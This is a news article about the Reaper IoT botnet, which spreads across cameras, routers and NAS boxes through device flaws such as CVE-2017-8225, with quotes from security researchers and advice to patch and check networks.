Emergent Tech

Internet of Things

Do fear the Reaper: Huge army of webcams, routers raised from 'one million' hacked orgs

Check your cameras, broadband gateways, NAS boxes for latest botnet malware

By John Leyden

48 SHARE

Miscreants are right now assembling a massive army of hacked Internet of Things devices – and at a far faster rate than the powerful Mirai botnet swelled its ranks last year.

This new cyber-militia of compromised gadgets, dubbed IoT_reaper or Reaper by experts at Qihoo 360 Netlab, can be instructed by its masters to attack websites and smash services offline.

The botnet's foot-soldiers – mainly press-ganged internet-connected cameras, home routers and similar gear – are located in more than a million organizations globally, security biz Check Point claimed on Thursday.

At first, it was assumed the malware infecting gizmos to form this latest army was a variant of the Mirai software nasty that took over hundreds of thousands of internet-connected equipment in 2016. However, security researchers now think it's another family of malicious software. There's no word yet on what exactly the botnet will be used for, either.

The Reaper malware is spreading globally by exploiting various vulnerabilities in embedded devices, such as CVE-2017-8225 to steal and use the usernames and passwords of gadgets' web-based control panels to ultimately commandeer them.

Ken Munro of infosec outfit Pen Test Partners pointed out that tomorrow is the one-year anniversary of the Mirai attacks against DNS provider Dyn. He also confirmed, using Shodan.io, that hundreds of thousands of internet-facing devices are potentially vulnerable to Reaper's exploits.

Source code unleashed for junk-blasting Internet of Things botnet

READ MORE

“Shodan shows potential devices," he said. "We don't know how many have already been compromised, but I've seen comment elsewhere that suggests about 2 million are in a queue to be exploited.”

During this month, the malware has been evolving to exploit vulnerabilities in wireless IP-based cameras, routers, storage boxes, Wi-Fi points, and so on, from vendors including D-Link, TP-Link, Avtech, Netgear, MikroTik, Linksys, and Synology.

For example, one of the botnet's drones – a hacked camera running a GoAhead embedded web server on TCP port 81 – had a System.ini file that had been changed to include a Netcat command that opened a reverse shell; a backdoor, in other words, that gave Reaper's masters command line to the device. Once the botnet's malware was on the camera, it proceeded to attempt to infect other equipment on the internet. Any subsequently hacked devices also cruise up and down the information superhighway for more vulnerable gizmos to hijack.

“This tells us that this machine was merely one link in the chain and that it was both infected and then also transmitting the infection,” said security researchers at Check Point. “In this case, the ‘CVE-2017-8225’ vulnerability was used to penetrate the GoAhead device and, after infecting a target machine, that same target started to look for other devices to infect.”

Right now, check to make sure you're not exposing a vulnerable device to the internet, apply any patches if you can, look out for suspicious behavior on your network, and take a gadget offline if it's infected. ®

Sign up to our NewsletterGet IT in your inbox daily

48 Comments

More from The Register

IoT shouters Chirp get themselves added to Microsoft Azure IoT

Now your devices can join you in bellowing at Redmond's products

Are your IoT gizmos, music boxes, smart home kit vulnerable to DNS rebinding attacks? Here's how to check

Fancy website, code emitted – Roku, Google, etc stuff at risk

Bad news, mobile operators: Unlicensed IoT tech rocketing ahead of NB-IoT and LTE-M – report

Plus global mobe mobs name Sigfox top IoT tech lag

IoT search engine ZoomEye 'dumbs down' Dahua DVR hijackings by spewing passwords

And noone wants to fix it

Windows 10 IoT Core Services unleashed to public preview

Gizmos gain control over Windows 10 updates - at a price

Look, what's that over there? Sophos nips Windows DNS DLL false positive in the bud

Temporary file during update shuffled off to quarantine

Cash-machine-draining €1bn cybercrime kingpin suspect cuffed by plod

Bod accused of masterminding malware attacks on banks around the world

Microsoft's next trick? Kicking things out of the cloud to Azure IoT Edge

Open-source service sticks containers in internet of stuffs

Forget Mirai – Brickerbot malware will kill your crap IoT devices

Rogue code aims to create permanent DoS

Another IoT botnet has been found feasting on vulnerable IP cameras

Children, please welcome Persirai to the class